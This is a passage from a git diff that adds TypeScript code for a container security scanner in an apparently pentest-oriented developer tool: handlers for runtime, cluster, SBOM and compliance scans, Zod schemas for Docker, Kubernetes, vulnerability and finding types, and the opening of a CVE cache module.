+      for (const severity of ["critical", "high", "medium", "low"]) {
+        if (grouped[severity]) {
+          lines.push(`\n#### ${severity.toUpperCase()} (${grouped[severity].length})`)
+          for (const f of grouped[severity].slice(0, 5)) {
+            lines.push(`- ${f.title} (${f.resource.name})`)
+          }
+        }
+      }
+    }
+
+    return {
+      title: `Runtime scan: ${result.stats.findingsCount} findings`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "scan-runtime",
+        status: "success",
+        stats: result.stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Runtime scan failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "scan-runtime", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle scan-registry action
+ */
+async function handleScanRegistry(
+  params: {
+    registryUrl?: string
+    registryType?: ContainerScanTypes.RegistryType
+    repository?: string
+    limit?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.registryUrl && !params.repository) {
+    return {
+      title: "Registry or repository required",
+      output: "Please provide registryUrl or repository",
+      metadata: { action: "scan-registry", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Scanning registry: ${params.registryUrl || params.repository}`,
+    metadata: { action: "scan-registry", status: "running" },
+  })
+
+  return {
+    title: "Registry scanning",
+    output: "Registry scanning requires authentication. Use scan-image for individual images.",
+    metadata: { action: "scan-registry", status: "info" },
+  }
+}
+
+/**
+ * Handle scan-cluster action
+ */
+async function handleScanCluster(
+  params: {
+    namespace?: string
+    profile?: ContainerScanTypes.ProfileId
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  ctx.metadata({
+    title: "Scanning Kubernetes cluster",
+    metadata: { action: "scan-cluster", namespace: params.namespace, status: "running" },
+  })
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["kubectl *", "kubeaudit *"],
+    always: ["kubectl *"],
+    metadata: { action: "scan-cluster" },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.scanCluster({
+      profile: params.profile,
+      namespace: params.namespace,
+    })
+
+    const lines: string[] = [
+      "## Kubernetes Cluster Security Audit",
+      "",
+    ]
+
+    if (result.cluster) {
+      lines.push("### Cluster Info")
+      lines.push(`- Context: ${result.cluster.context}`)
+      lines.push(`- Server: ${result.cluster.server}`)
+      if (result.cluster.version) lines.push(`- Version: ${result.cluster.version}`)
+      lines.push("")
+    }
+
+    lines.push("### Summary")
+    lines.push(`- Pods: ${result.stats.totalPods}`)
+    lines.push(`- Privileged Pods: ${result.stats.privilegedPods}`)
+    lines.push(`- Host Network Pods: ${result.stats.hostNetworkPods}`)
+    lines.push(`- Cluster Admin Bindings: ${result.stats.clusterAdminBindings}`)
+    lines.push(`- Findings: ${result.stats.findingsCount}`)
+    lines.push("")
+
+    if (result.findings.length > 0) {
+      lines.push("### Security Findings")
+      for (const f of result.findings.slice(0, 10)) {
+        lines.push(`- **${f.severity.toUpperCase()}**: ${f.title}`)
+      }
+      if (result.findings.length > 10) {
+        lines.push(`  ...and ${result.findings.length - 10} more`)
+      }
+    }
+
+    return {
+      title: `Cluster scan: ${result.stats.findingsCount} findings`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "scan-cluster",
+        status: "success",
+        stats: result.stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Cluster scan failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "scan-cluster", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle sbom action
+ */
+async function handleSBOM(
+  params: {
+    image?: string
+    sbomFormat?: "json" | "cyclonedx-json" | "spdx-json"
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.image) {
+    return {
+      title: "Image required",
+      output: "Please provide an image to generate SBOM for",
+      metadata: { action: "sbom", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Generating SBOM for ${params.image}`,
+    metadata: { action: "sbom", image: params.image, status: "running" },
+  })
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["syft *", "docker *"],
+    always: ["syft *"],
+    metadata: { action: "sbom", image: params.image },
+  })
+
+  try {
+    const sbom = await ContainerScanOrchestrator.generateSBOM(params.image, {
+      format: params.sbomFormat,
+    })
+
+    const summary = SyftParser.summarize(sbom)
+
+    const lines: string[] = [
+      `## Software Bill of Materials: ${params.image}`,
+      "",
+      `Format: ${sbom.format}`,
+      `Components: ${summary.totalComponents}`,
+      "",
+      "### Components by Type",
+    ]
+
+    for (const [type, count] of Object.entries(summary.byType)) {
+      lines.push(`- ${type}: ${count}`)
+    }
+
+    lines.push("")
+    lines.push("### Top Packages")
+    for (const pkg of summary.topPackages) {
+      lines.push(`- ${pkg.name}@${pkg.version} (${pkg.type})`)
+    }
+
+    if (Object.keys(summary.byLicense).length > 0) {
+      lines.push("")
+      lines.push("### Licenses")
+      const topLicenses = Object.entries(summary.byLicense)
+        .sort((a, b) => b[1] - a[1])
+        .slice(0, 5)
+      for (const [license, count] of topLicenses) {
+        lines.push(`- ${license}: ${count}`)
+      }
+    }
+
+    return {
+      title: `SBOM: ${summary.totalComponents} components`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "sbom",
+        status: "success",
+        sbomId: sbom.id,
+        image: params.image,
+        components: summary.totalComponents,
+      },
+    }
+  } catch (error) {
+    return {
+      title: `SBOM generation failed`,
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "sbom", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle compliance action
+ */
+async function handleCompliance(
+  params: {
+    framework?: ContainerScanTypes.ComplianceFramework
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  ctx.metadata({
+    title: `Running compliance checks`,
+    metadata: { action: "compliance", framework: params.framework, status: "running" },
+  })
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["docker *", "kubectl *", "kubeaudit *"],
+    always: ["docker *", "kubectl *"],
+    metadata: { action: "compliance" },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.scan(["*"], {
+      profile: "compliance",
+    })
+
+    const lines: string[] = [
+      "## Compliance Check Results",
+      "",
+    ]
+
+    for (const comp of result.compliance || []) {
+      lines.push(`### ${comp.framework.toUpperCase()}`)
+      lines.push(`- Passed: ${comp.passed}`)
+      lines.push(`- Failed: ${comp.failed}`)
+      lines.push(`- Skipped: ${comp.skipped}`)
+      lines.push("")
+    }
+
+    const complianceFindings = result.findings.filter((f) => f.compliance && f.compliance.length > 0)
+    if (complianceFindings.length > 0) {
+      lines.push("### Compliance Findings")
+      for (const f of complianceFindings.slice(0, 10)) {
+        const frameworks = f.compliance?.map((c) => c.framework).join(", ")
+        lines.push(`- **${f.severity.toUpperCase()}**: ${f.title} (${frameworks})`)
+      }
+    }
+
+    return {
+      title: `Compliance: ${complianceFindings.length} findings`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "compliance",
+        status: "success",
+        findings: complianceFindings.length,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Compliance check failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "compliance", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle status action
+ */
+async function handleStatus(params: {
+  scanId?: string
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (params.scanId) {
+    const scan = await ContainerScanStorage.getScan(params.scanId)
+    if (!scan) {
+      return {
+        title: "Scan not found",
+        output: `No scan found with ID: ${params.scanId}`,
+        metadata: { action: "status", status: "error" },
+      }
+    }
+
+    return {
+      title: `Scan ${scan.id}: ${scan.status}`,
+      output: [
+        `Scan ID: ${scan.id}`,
+        `Profile: ${scan.profile}`,
+        `Status: ${scan.status}`,
+        `Started: ${new Date(scan.startedAt).toISOString()}`,
+        scan.completedAt ? `Completed: ${new Date(scan.completedAt).toISOString()}` : "",
+        `Images: ${scan.stats.imagesScanned}`,
+        `Vulnerabilities: ${scan.stats.totalVulnerabilities}`,
+        `Findings: ${scan.stats.findingsCount}`,
+      ]
+        .filter(Boolean)
+        .join("\n"),
+      metadata: {
+        action: "status",
+        status: "success",
+        scan: { id: scan.id, status: scan.status, stats: scan.stats },
+      },
+    }
+  }
+
+  // List recent scans
+  const scans = await ContainerScanStorage.listScans({}, { limit: 5 })
+
+  if (scans.length === 0) {
+    return {
+      title: "No scans found",
+      output: "No container scans have been run yet.",
+      metadata: { action: "status", status: "success", scans: 0 },
+    }
+  }
+
+  const lines = ["## Recent Container Scans", ""]
+  for (const scan of scans) {
+    lines.push(`- **${scan.id}** (${scan.profile})`)
+    lines.push(`  Status: ${scan.status} | Vulns: ${scan.stats.totalVulnerabilities} | Findings: ${scan.stats.findingsCount}`)
+  }
+
+  return {
+    title: `${scans.length} recent scans`,
+    output: lines.join("\n"),
+    metadata: { action: "status", status: "success", scans: scans.length },
+  }
+}
+
+/**
+ * Handle profiles action
+ */
+function handleProfiles(): { title: string; output: string; metadata: Record<string, unknown> } {
+  const profiles = ContainerScanProfiles.list()
+
+  const lines = ["## Container Scan Profiles", ""]
+  for (const profile of profiles) {
+    lines.push(`### ${profile.name} (${profile.id})`)
+    lines.push(ContainerScanProfiles.describe(profile))
+    lines.push("")
+  }
+
+  return {
+    title: `${profiles.length} scan profiles`,
+    output: lines.join("\n"),
+    metadata: { action: "profiles", status: "success", profiles: profiles.map((p) => p.id) },
+  }
+}
+
+/**
+ * Format bytes
+ */
+function formatBytes(bytes: number): string {
+  if (bytes < 1024) return `${bytes} B`
+  if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`
+  if (bytes < 1024 * 1024 * 1024) return `${(bytes / (1024 * 1024)).toFixed(1)} MB`
+  return `${(bytes / (1024 * 1024 * 1024)).toFixed(1)} GB`
+}
diff --git a/packages/opencode/src/pentest/containerscan/types.ts b/packages/opencode/src/pentest/containerscan/types.ts
new file mode 100644
index 00000000000..83bc464252d
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/types.ts
@@ -0,0 +1,684 @@
+/**
+ * @fileoverview Container Security Scanner Types
+ *
+ * Zod schemas for container security scanning including:
+ * - Docker image and container types
+ * - Kubernetes cluster, pod, and RBAC types
+ * - Registry and SBOM types
+ * - Vulnerability and finding types
+ * - Scan profiles and results
+ *
+ * @module pentest/containerscan/types
+ */
+
+import z from "zod"
+
+export namespace ContainerScanTypes {
+  // =====================
+  // Core Enums
+  // =====================
+
+  /**
+   * Scan status
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Severity levels
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "negligible", "unknown"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * Container runtime type
+   */
+  export const RuntimeType = z.enum(["docker", "containerd", "crio", "podman"])
+  export type RuntimeType = z.infer<typeof RuntimeType>
+
+  /**
+   * Registry type
+   */
+  export const RegistryType = z.enum(["dockerhub", "ecr", "acr", "gcr", "ghcr", "quay", "harbor", "generic"])
+  export type RegistryType = z.infer<typeof RegistryType>
+
+  /**
+   * Scan profile IDs
+   */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "compliance", "sbom-only"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Compliance framework
+   */
+  export const ComplianceFramework = z.enum(["cis-docker", "cis-kubernetes", "nsa-cisa", "pci-dss", "hipaa", "soc2"])
+  export type ComplianceFramework = z.infer<typeof ComplianceFramework>
+
+  /**
+   * Finding category
+   */
+  export const FindingCategory = z.enum([
+    "vulnerability",
+    "misconfiguration",
+    "secret",
+    "compliance",
+    "rbac",
+    "network",
+    "runtime",
+  ])
+  export type FindingCategory = z.infer<typeof FindingCategory>
+
+  // =====================
+  // Docker Types
+  // =====================
+
+  /**
+   * Docker image information
+   */
+  export const DockerImage = z.object({
+    id: z.string(),
+    repoTags: z.array(z.string()).default([]),
+    repoDigests: z.array(z.string()).default([]),
+    created: z.string(),
+    size: z.number(),
+    virtualSize: z.number().optional(),
+    labels: z.record(z.string(), z.string()).optional(),
+    architecture: z.string().optional(),
+    os: z.string().optional(),
+    author: z.string().optional(),
+  })
+  export type DockerImage = z.infer<typeof DockerImage>
+
+  /**
+   * Docker container port mapping
+   */
+  export const PortMapping = z.object({
+    containerPort: z.number(),
+    hostPort: z.number().optional(),
+    hostIp: z.string().optional(),
+    protocol: z.enum(["tcp", "udp"]).default("tcp"),
+  })
+  export type PortMapping = z.infer<typeof PortMapping>
+
+  /**
+   * Docker container mount
+   */
+  export const ContainerMount = z.object({
+    type: z.enum(["bind", "volume", "tmpfs"]),
+    source: z.string(),
+    destination: z.string(),
+    mode: z.string().optional(),
+    readOnly: z.boolean().default(false),
+  })
+  export type ContainerMount = z.infer<typeof ContainerMount>
+
+  /**
+   * Running Docker container
+   */
+  export const RunningContainer = z.object({
+    id: z.string(),
+    name: z.string(),
+    image: z.string(),
+    imageId: z.string(),
+    created: z.string(),
+    state: z.enum(["running", "paused", "restarting", "exited", "dead"]),
+    status: z.string(),
+    ports: z.array(PortMapping).default([]),
+    mounts: z.array(ContainerMount).default([]),
+    labels: z.record(z.string(), z.string()).optional(),
+    networkMode: z.string().optional(),
+    privileged: z.boolean().default(false),
+    user: z.string().optional(),
+    capabilities: z.object({
+      add: z.array(z.string()).default([]),
+      drop: z.array(z.string()).default([]),
+    }).optional(),
+    securityOpt: z.array(z.string()).optional(),
+    readOnlyRootfs: z.boolean().default(false),
+    pidMode: z.string().optional(),
+    ipcMode: z.string().optional(),
+  })
+  export type RunningContainer = z.infer<typeof RunningContainer>
+
+  /**
+   * Docker daemon configuration
+   */
+  export const DockerDaemonConfig = z.object({
+    tlsEnabled: z.boolean().default(false),
+    tlsVerify: z.boolean().default(false),
+    authzPlugins: z.array(z.string()).default([]),
+    logDriver: z.string().optional(),
+    storageDriver: z.string().optional(),
+    userlandProxy: z.boolean().optional(),
+    liveRestore: z.boolean().optional(),
+    usernsRemap: z.string().optional(),
+    seccompProfile: z.string().optional(),
+    noNewPrivileges: z.boolean().optional(),
+    icc: z.boolean().optional(),
+  })
+  export type DockerDaemonConfig = z.infer<typeof DockerDaemonConfig>
+
+  // =====================
+  // Kubernetes Types
+  // =====================
+
+  /**
+   * Kubernetes cluster info
+   */
+  export const KubernetesCluster = z.object({
+    name: z.string(),
+    context: z.string(),
+    server: z.string(),
+    version: z.string().optional(),
+    namespace: z.string().default("default"),
+    nodeCount: z.number().optional(),
+    podCount: z.number().optional(),
+  })
+  export type KubernetesCluster = z.infer<typeof KubernetesCluster>
+
+  /**
+   * Pod security context
+   */
+  export const PodSecurityContext = z.object({
+    runAsUser: z.number().optional(),
+    runAsGroup: z.number().optional(),
+    runAsNonRoot: z.boolean().optional(),
+    fsGroup: z.number().optional(),
+    privileged: z.boolean().optional(),
+    allowPrivilegeEscalation: z.boolean().optional(),
+    readOnlyRootFilesystem: z.boolean().optional(),
+    capabilities: z.object({
+      add: z.array(z.string()).default([]),
+      drop: z.array(z.string()).default([]),
+    }).optional(),
+    seccompProfile: z.string().optional(),
+    seLinuxOptions: z.record(z.string(), z.string()).optional(),
+  })
+  export type PodSecurityContext = z.infer<typeof PodSecurityContext>
+
+  /**
+   * Kubernetes pod
+   */
+  export const Pod = z.object({
+    name: z.string(),
+    namespace: z.string(),
+    uid: z.string().optional(),
+    labels: z.record(z.string(), z.string()).optional(),
+    annotations: z.record(z.string(), z.string()).optional(),
+    nodeName: z.string().optional(),
+    serviceAccountName: z.string().optional(),
+    hostNetwork: z.boolean().default(false),
+    hostPID: z.boolean().default(false),
+    hostIPC: z.boolean().default(false),
+    securityContext: PodSecurityContext.optional(),
+    containers: z.array(z.object({
+      name: z.string(),
+      image: z.string(),
+      securityContext: PodSecurityContext.optional(),
+      ports: z.array(z.object({
+        containerPort: z.number(),
+        protocol: z.string().optional(),
+      })).optional(),
+      volumeMounts: z.array(z.object({
+        name: z.string(),
+        mountPath: z.string(),
+        readOnly: z.boolean().optional(),
+      })).optional(),
+      resources: z.object({
+        limits: z.record(z.string(), z.string()).optional(),
+        requests: z.record(z.string(), z.string()).optional(),
+      }).optional(),
+    })).default([]),
+    volumes: z.array(z.object({
+      name: z.string(),
+      hostPath: z.object({ path: z.string(), type: z.string().optional() }).optional(),
+      secret: z.object({ secretName: z.string() }).optional(),
+      configMap: z.object({ name: z.string() }).optional(),
+    })).optional(),
+    status: z.enum(["Pending", "Running", "Succeeded", "Failed", "Unknown"]).optional(),
+  })
+  export type Pod = z.infer<typeof Pod>
+
+  /**
+   * RBAC role binding
+   */
+  export const RBACBinding = z.object({
+    name: z.string(),
+    namespace: z.string().optional(),
+    kind: z.enum(["RoleBinding", "ClusterRoleBinding"]),
+    roleRef: z.object({
+      kind: z.enum(["Role", "ClusterRole"]),
+      name: z.string(),
+      apiGroup: z.string().optional(),
+    }),
+    subjects: z.array(z.object({
+      kind: z.enum(["User", "Group", "ServiceAccount"]),
+      name: z.string(),
+      namespace: z.string().optional(),
+    })).default([]),
+  })
+  export type RBACBinding = z.infer<typeof RBACBinding>
+
+  /**
+   * RBAC role with rules
+   */
+  export const RBACRole = z.object({
+    name: z.string(),
+    namespace: z.string().optional(),
+    kind: z.enum(["Role", "ClusterRole"]),
+    rules: z.array(z.object({
+      apiGroups: z.array(z.string()).default([]),
+      resources: z.array(z.string()).default([]),
+      verbs: z.array(z.string()).default([]),
+      resourceNames: z.array(z.string()).optional(),
+    })).default([]),
+  })
+  export type RBACRole = z.infer<typeof RBACRole>
+
+  /**
+   * Kubernetes network policy
+   */
+  export const NetworkPolicy = z.object({
+    name: z.string(),
+    namespace: z.string(),
+    podSelector: z.record(z.string(), z.string()).optional(),
+    policyTypes: z.array(z.enum(["Ingress", "Egress"])).default([]),
+    ingress: z.array(z.object({
+      from: z.array(z.object({
+        podSelector: z.record(z.string(), z.string()).optional(),
+        namespaceSelector: z.record(z.string(), z.string()).optional(),
+        ipBlock: z.object({ cidr: z.string(), except: z.array(z.string()).optional() }).optional(),
+      })).optional(),
+      ports: z.array(z.object({
+        protocol: z.string().optional(),
+        port: z.union([z.number(), z.string()]).optional(),
+      })).optional(),
+    })).optional(),
+    egress: z.array(z.object({
+      to: z.array(z.object({
+        podSelector: z.record(z.string(), z.string()).optional(),
+        namespaceSelector: z.record(z.string(), z.string()).optional(),
+        ipBlock: z.object({ cidr: z.string(), except: z.array(z.string()).optional() }).optional(),
+      })).optional(),
+      ports: z.array(z.object({
+        protocol: z.string().optional(),
+        port: z.union([z.number(), z.string()]).optional(),
+      })).optional(),
+    })).optional(),
+  })
+  export type NetworkPolicy = z.infer<typeof NetworkPolicy>
+
+  /**
+   * Kubernetes secret (metadata only)
+   */
+  export const K8sSecret = z.object({
+    name: z.string(),
+    namespace: z.string(),
+    type: z.string(),
+    keys: z.array(z.string()).default([]),
+    createdAt: z.string().optional(),
+    annotations: z.record(z.string(), z.string()).optional(),
+  })
+  export type K8sSecret = z.infer<typeof K8sSecret>
+
+  // =====================
+  // Registry Types
+  // =====================
+
+  /**
+   * Container registry
+   */
+  export const Registry = z.object({
+    type: RegistryType,
+    url: z.string(),
+    name: z.string().optional(),
+    authenticated: z.boolean().default(false),
+    region: z.string().optional(),
+    project: z.string().optional(),
+  })
+  export type Registry = z.infer<typeof Registry>
+
+  /**
+   * Registry image
+   */
+  export const RegistryImage = z.object({
+    registry: z.string(),
+    repository: z.string(),
+    tag: z.string().default("latest"),
+    digest: z.string().optional(),
+    size: z.number().optional(),
+    pushedAt: z.string().optional(),
+    labels: z.record(z.string(), z.string()).optional(),
+  })
+  export type RegistryImage = z.infer<typeof RegistryImage>
+
+  // =====================
+  // Vulnerability Types
+  // =====================
+
+  /**
+   * Image vulnerability
+   */
+  export const ImageVulnerability = z.object({
+    id: z.string(),
+    cveId: z.string().optional(),
+    severity: Severity,
+    title: z.string(),
+    description: z.string().optional(),
+    packageName: z.string(),
+    installedVersion: z.string(),
+    fixedVersion: z.string().optional(),
+    layer: z.string().optional(),
+    cvss: z.object({
+      score: z.number().optional(),
+      vector: z.string().optional(),
+    }).optional(),
+    references: z.array(z.string()).optional(),
+    publishedDate: z.string().optional(),
+  })
+  export type ImageVulnerability = z.infer<typeof ImageVulnerability>
+
+  // =====================
+  // SBOM Types
+  // =====================
+
+  /**
+   * SBOM component
+   */
+  export const SBOMComponent = z.object({
+    name: z.string(),
+    version: z.string(),
+    type: z.enum(["library", "application", "framework", "operating-system", "device", "file"]),
+    purl: z.string().optional(),
+    cpe: z.string().optional(),
+    licenses: z.array(z.string()).optional(),
+    supplier: z.string().optional(),
+    hashes: z.record(z.string(), z.string()).optional(),
+  })
+  export type SBOMComponent = z.infer<typeof SBOMComponent>
+
+  /**
+   * SBOM (Software Bill of Materials)
+   */
+  export const SBOM = z.object({
+    id: z.string(),
+    image: z.string(),
+    format: z.enum(["spdx", "cyclonedx", "syft"]),
+    createdAt: z.number(),
+    components: z.array(SBOMComponent).default([]),
+    metadata: z.object({
+      tool: z.string().optional(),
+      toolVersion: z.string().optional(),
+    }).optional(),
+  })
+  export type SBOM = z.infer<typeof SBOM>
+
+  // =====================
+  // Finding Types
+  // =====================
+
+  /**
+   * Container security finding
+   */
+  export const ContainerFinding = z.object({
+    id: z.string(),
+    category: FindingCategory,
+    severity: Severity,
+    title: z.string(),
+    description: z.string(),
+    resource: z.object({
+      type: z.enum(["image", "container", "pod", "cluster", "registry", "daemon"]),
+      name: z.string(),
+      namespace: z.string().optional(),
+    }),
+    cveId: z.string().optional(),
+    cweId: z.string().optional(),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).optional(),
+    evidence: z.record(z.string(), z.unknown()).optional(),
+    compliance: z.array(z.object({
+      framework: ComplianceFramework,
+      control: z.string(),
+      description: z.string().optional(),
+    })).optional(),
+    detectedAt: z.number(),
+  })
+  export type ContainerFinding = z.infer<typeof ContainerFinding>
+
+  // =====================
+  // Scan Result Types
+  // =====================
+
+  /**
+   * Image scan result
+   */
+  export const ImageScanResult = z.object({
+    image: z.string(),
+    imageId: z.string().optional(),
+    digest: z.string().optional(),
+    vulnerabilities: z.array(ImageVulnerability).default([]),
+    sbom: SBOM.optional(),
+    scanTool: z.string(),
+    scannedAt: z.number(),
+    stats: z.object({
+      critical: z.number().default(0),
+      high: z.number().default(0),
+      medium: z.number().default(0),
+      low: z.number().default(0),
+      negligible: z.number().default(0),
+      unknown: z.number().default(0),
+      total: z.number().default(0),
+      fixable: z.number().default(0),
+    }),
+  })
+  export type ImageScanResult = z.infer<typeof ImageScanResult>
+
+  /**
+   * Runtime scan result
+   */
+  export const RuntimeScanResult = z.object({
+    containers: z.array(RunningContainer).default([]),
+    findings: z.array(ContainerFinding).default([]),
+    daemonConfig: DockerDaemonConfig.optional(),
+    scannedAt: z.number(),
+    stats: z.object({
+      totalContainers: z.number().default(0),
+      privilegedContainers: z.number().default(0),
+      rootContainers: z.number().default(0),
+      findingsCount: z.number().default(0),
+    }),
+  })
+  export type RuntimeScanResult = z.infer<typeof RuntimeScanResult>
+
+  /**
+   * Kubernetes scan result
+   */
+  export const KubernetesScanResult = z.object({
+    cluster: KubernetesCluster.optional(),
+    pods: z.array(Pod).default([]),
+    rbacBindings: z.array(RBACBinding).default([]),
+    networkPolicies: z.array(NetworkPolicy).default([]),
+    secrets: z.array(K8sSecret).default([]),
+    findings: z.array(ContainerFinding).default([]),
+    scannedAt: z.number(),
+    stats: z.object({
+      totalPods: z.number().default(0),
+      privilegedPods: z.number().default(0),
+      hostNetworkPods: z.number().default(0),
+      clusterAdminBindings: z.number().default(0),
+      findingsCount: z.number().default(0),
+    }),
+  })
+  export type KubernetesScanResult = z.infer<typeof KubernetesScanResult>
+
+  /**
+   * Compliance check result
+   */
+  export const ComplianceResult = z.object({
+    framework: ComplianceFramework,
+    passed: z.number().default(0),
+    failed: z.number().default(0),
+    skipped: z.number().default(0),
+    checks: z.array(z.object({
+      id: z.string(),
+      title: z.string(),
+      description: z.string().optional(),
+      status: z.enum(["passed", "failed", "skipped"]),
+      severity: Severity,
+      remediation: z.string().optional(),
+    })).default([]),
+    scannedAt: z.number(),
+  })
+  export type ComplianceResult = z.infer<typeof ComplianceResult>
+
+  /**
+   * Full container scan result
+   */
+  export const ContainerScanResult = z.object({
+    id: z.string(),
+    profile: ProfileId,
+    status: Status,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    images: z.array(ImageScanResult).default([]),
+    runtime: RuntimeScanResult.optional(),
+    kubernetes: KubernetesScanResult.optional(),
+    compliance: z.array(ComplianceResult).optional(),
+    findings: z.array(ContainerFinding).default([]),
+    sboms: z.array(SBOM).default([]),
+    stats: z.object({
+      imagesScanned: z.number().default(0),
+      containersScanned: z.number().default(0),
+      totalVulnerabilities: z.number().default(0),
+      criticalVulnerabilities: z.number().default(0),
+      highVulnerabilities: z.number().default(0),
+      findingsCount: z.number().default(0),
+      duration: z.number().default(0),
+    }),
+    error: z.string().optional(),
+  })
+  export type ContainerScanResult = z.infer<typeof ContainerScanResult>
+
+  // =====================
+  // Profile Types
+  // =====================
+
+  /**
+   * Image scan configuration
+   */
+  export const ImageScanConfig = z.object({
+    enabled: z.boolean().default(true),
+    scanVulnerabilities: z.boolean().default(true),
+    generateSBOM: z.boolean().default(false),
+    scanSecrets: z.boolean().default(false),
+    severityThreshold: Severity.default("low"),
+    ignoreUnfixed: z.boolean().default(false),
+  })
+  export type ImageScanConfig = z.infer<typeof ImageScanConfig>
+
+  /**
+   * Runtime scan configuration
+   */
+  export const RuntimeScanConfig = z.object({
+    enabled: z.boolean().default(true),
+    checkPrivileged: z.boolean().default(true),
+    checkRootUser: z.boolean().default(true),
+    checkCapabilities: z.boolean().default(true),
+    checkMounts: z.boolean().default(true),
+    checkNetworking: z.boolean().default(true),
+    checkDaemon: z.boolean().default(false),
+  })
+  export type RuntimeScanConfig = z.infer<typeof RuntimeScanConfig>
+
+  /**
+   * Kubernetes scan configuration
+   */
+  export const KubernetesScanConfig = z.object({
+    enabled: z.boolean().default(false),
+    scanPods: z.boolean().default(true),
+    scanRBAC: z.boolean().default(true),
+    scanNetworkPolicies: z.boolean().default(true),
+    scanSecrets: z.boolean().default(false),
+    scanAdmission: z.boolean().default(false),
+    namespace: z.string().optional(),
+  })
+  export type KubernetesScanConfig = z.infer<typeof KubernetesScanConfig>
+
+  /**
+   * Compliance scan configuration
+   */
+  export const ComplianceScanConfig = z.object({
+    enabled: z.boolean().default(false),
+    frameworks: z.array(ComplianceFramework).default([]),
+  })
+  export type ComplianceScanConfig = z.infer<typeof ComplianceScanConfig>
+
+  /**
+   * Scan profile
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    image: ImageScanConfig,
+    runtime: RuntimeScanConfig,
+    kubernetes: KubernetesScanConfig,
+    compliance: ComplianceScanConfig,
+    externalTools: z.array(z.enum(["trivy", "grype", "syft", "kubeaudit"])).default([]),
+    timeout: z.number().default(300000),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // =====================
+  // Tool Action Types
+  // =====================
+
+  export const ToolAction = z.enum([
+    "discover",
+    "scan",
+    "scan-image",
+    "scan-runtime",
+    "scan-registry",
+    "scan-cluster",
+    "sbom",
+    "compliance",
+    "status",
+    "profiles",
+  ])
+  export type ToolAction = z.infer<typeof ToolAction>
+
+  // =====================
+  // Helper Functions
+  // =====================
+
+  /**
+   * Get severity priority (lower is more severe)
+   */
+  export function severityPriority(severity: Severity): number {
+    const priorities: Record<Severity, number> = {
+      critical: 0,
+      high: 1,
+      medium: 2,
+      low: 3,
+      negligible: 4,
+      unknown: 5,
+    }
+    return priorities[severity] ?? 5
+  }
+
+  /**
+   * Compare severities
+   */
+  export function compareSeverity(a: Severity, b: Severity): number {
+    return severityPriority(a) - severityPriority(b)
+  }
+
+  /**
+   * Generate scan ID
+   */
+  export function generateScanId(): string {
+    const timestamp = Date.now().toString(36)
+    const random = Math.random().toString(36).slice(2, 8)
+    return `cscan_${timestamp}_${random}`
+  }
+}
diff --git a/packages/opencode/src/pentest/cve/cache.ts b/packages/opencode/src/pentest/cve/cache.ts
new file mode 100644
index 00000000000..279eefa6a10
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/cache.ts
@@ -0,0 +1,393 @@
+/**
+ * @fileoverview CVE Cache Implementation
+ *
+ * Provides file-based caching for CVE lookups with:
+ * - TTL-based expiration
+ * - LRU eviction when cache is full
+ * - Hit/miss statistics
+ * - Automatic cleanup
+ *
+ * @module pentest/cve/cache
+ */
+
+import { Storage } from "../../storage/storage"
+import { Log } from "../../util/log"
+import { CVETypes } from "./types"
+
+const log = Log.create({ service: "pentest.cve.cache" })
+
+/**
+ * Cache configuration
+ */
+export interface CVECacheConfig {
+  /** TTL in milliseconds (default: 24 hours) */
+  ttl?: number
+  /** Maximum cache entries (default: 10000) */
+  maxEntries?: number
+  /** Use memory-only storage */
+  memoryOnly?: boolean
+}
+
+const DEFAULT_TTL = 24 * 60 * 60 * 1000 // 24 hours
+const DEFAULT_MAX_ENTRIES = 10000
+const CACHE_PATH = ["pentest", "cve", "cache"]
+const STATS_PATH = ["pentest", "cve", "cache_stats"]
+
+// In-memory cache for fast access
+const memoryCache = new Map<string, CVETypes.CacheEntry>()
+
+// Cache statistics
+let cacheStats: CVETypes.CacheStats = {
+  entries: 0,
+  hits: 0,
+  misses: 0,
+  size: 0,
+  oldestEntry: undefined,
+  newestEntry: undefined,
+}
+
+/**
+ * CVE Cache namespace
+ */
+export namespace CVECache {
+  /**
+   * Get a CVE from cache
+   */
